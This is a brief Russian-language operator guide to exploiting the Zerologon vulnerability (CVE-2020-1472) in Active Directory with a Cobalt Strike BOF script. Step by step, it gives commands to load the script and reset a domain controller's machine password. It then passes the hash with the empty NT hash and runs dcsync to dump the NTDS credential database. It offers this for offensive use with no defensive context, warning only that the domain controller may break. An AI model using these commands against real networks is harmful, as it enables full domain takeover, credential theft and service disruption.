Эксплуатация CVE-2020-1472 Zerologon в Cobalt Strike

Выкачиваем скрипт тут
https://github.com/rsmudge/ZeroLogon-BOF

Подключаем как обычно, адрес скрипта
ZeroLogon-BOF/dist/zerologon.cna

В консоли должна появится новая команда - zerologon

Применение:

net domain - получаем имя домена (Например domain.local)

Запускаем эксплоит:
zerologon iunderstand domain.local

iunderstand - стоп слово. Эксплуатируя эту уязвимость мы сбрасываем пароль. Этот эксплоит может привести к нарушению функционирования контроллера домена. ИСПОЛЬЗУЕМ В ПОСЛЕДНЮЮ ОЧЕРЕДЬ.

В случае успеха мы получаем:
Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync

Делаем все как написанно. выполняем
pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0

И выполняем
dcsync domain.local

Если все успешно отработало, мы получаем NTDS